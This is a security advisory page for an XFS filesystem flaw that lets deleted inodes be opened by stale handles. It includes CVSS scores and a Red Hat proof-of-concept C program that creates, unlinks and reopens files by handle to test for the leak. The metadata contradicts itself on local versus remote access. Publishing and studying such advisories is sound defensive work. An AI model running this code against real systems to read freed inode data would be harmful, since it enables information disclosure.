XFS Deleted Inode Local Information Disclosure Vulnerability

2010-10-05 / 2010-10-06
Credit: Red Hat
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 7.9/10
Impact Subscore: 9.2/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: None

* stale_handle.c - attempt to create a stale handle and open it * * Copyright (C) 2010 Red Hat, Inc. All Rights reserved. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * Credit: David Chinner * The XFS filesystem is prone to a local information-disclosure vulnerability. * * Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. * Denial-of-service attacks may also be possible. */ #define TEST_UTIME #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> #include <errno.h> #include <xfs/xfs.h> #include <xfs/handle.h> #define NUMFILES 1024 int main(int argc, char **argv) { int i; int fd; int ret; int failed = 0; char fname[MAXPATHLEN]; char *test_dir; void *handle[NUMFILES]; size_t hlen[NUMFILES]; char fshandle[256]; size_t fshlen; struct stat st; if (argc != 2) { fprintf(stderr, "usage: stale_handle test_dir\n"); return EXIT_FAILURE; } test_dir = argv[1]; if (stat(test_dir, &st) != 0) { perror("stat"); return EXIT_FAILURE; } ret = path_to_fshandle(test_dir, (void **)fshandle, &fshlen); if (ret < 0) { perror("path_to_fshandle"); return EXIT_FAILURE; } /* * create a large number of files to force allocation of new inode * chunks on disk. */ for (i=0; i < NUMFILES; i++) { sprintf(fname, "%s/file%06d", test_dir, i); fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0644); if (fd < 0) { printf("Warning (%s,%d), open(%s) failed.\n", __FILE__, __LINE__, fname); perror(fname); return EXIT_FAILURE; } close(fd); } /* sync to get the new inodes to hit the disk */ sync(); /* create the handles */ for (i=0; i < NUMFILES; i++) { sprintf(fname, "%s/file%06d", test_dir, i); ret = path_to_handle(fname, &handle[i], &hlen[i]); if (ret < 0) { perror("path_to_handle"); return EXIT_FAILURE; } } /* unlink the files */ for (i=0; i < NUMFILES; i++) { sprintf(fname, "%s/file%06d", test_dir, i); ret = unlink(fname); if (ret < 0) { perror("unlink"); return EXIT_FAILURE; } } /* sync to get log forced for unlink transactions to hit the disk */ sync(); /* sync once more FTW */ sync(); /* * now drop the caches so that unlinked inodes are reclaimed and * buftarg page cache is emptied so that the inode cluster has to be * fetched from disk again for the open_by_handle() call. */ system("echo 3 > /proc/sys/vm/drop_caches"); /* * now try to open the files by the stored handles. Expecting ENOENT * for all of them. */ for (i=0; i < NUMFILES; i++) { errno = 0; fd = open_by_handle(handle[i], hlen[i], O_RDWR); if (fd < 0 && errno == ENOENT) { free_handle(handle[i], hlen[i]); continue; } if (ret >= 0) { printf("open_by_handle(%d) opened an unlinked file!\n", i); close(fd); } else printf("open_by_handle(%d) returned %d incorrectly on an unlinked file!\n", i, errno); free_handle(handle[i], hlen[i]); failed++; } if (failed) return EXIT_FAILURE; return EXIT_SUCCESS; }

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7124fe0a5b619d65b739477b3b55a20bf805b06d
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1920779e67cbf5ea8afef317777c5bf2b8096188
https://bugzilla.redhat.com/show_bug.cgi?id=624923
http://www.securityfocus.com/bid/42527
http://www.openwall.com/lists/oss-security/2010/08/19/5
http://www.openwall.com/lists/oss-security/2010/08/18/2
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.35
http://oss.sgi.com/archives/xfs/2010-06/msg00198.html
http://oss.sgi.com/archives/xfs/2010-06/msg00191.html
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7b6259e7a83647948fa33a736cc832310c8d85aa
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33771
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33769
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33768
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33767


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top